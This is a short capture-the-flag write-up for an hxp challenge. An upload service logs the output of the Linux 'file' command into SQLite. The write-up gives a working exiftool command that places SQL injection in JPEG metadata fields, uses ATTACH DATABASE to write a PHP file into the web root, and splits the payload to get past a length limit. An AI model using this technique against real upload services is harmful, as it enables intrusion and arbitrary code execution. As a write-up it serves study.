This was a fun challenge. Once you upload a file you immediately notice that it uses the output of the file command on Linux. It will also certain metadata for a few filetypes.

1. Generate a 1x1 jpeg
2. exiftool -overwrite_original -comment="/INSERT INTO l.p (d) VALUES ('<?php echo file_get_contents("/flag_LF9E2plMbHucEqfr.txt");'); --" -software="a'); ATTACH DATABASE '/var/www/html/files/payload1.php' AS l; CREATE TABLE l.p (d text);/" white.jpg
3. Upload to abuse the SQLi in SQLite

We had to split it into two parts and join it using comments to bypass the ~95 char length limit. Getting the filename can be done by doing a second payload with scandir('/').

~$  file ~/Downloads/white.jpg
white.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=1, software=a'); ATTACH DATABASE '/var/www/html/files/uc7.php' AS l; CREATE TABLE l.p (d text);/*], comment: "*/INSERT INTO l.p (d) VALUES ('<?php echo file_get_contents("/flag_LF9E2plMbHucEqfr.txt");'); ", baseline, precision 8, 1x1, components 1

This will yield hxp{I should have listened to my mum about not trusting files about files}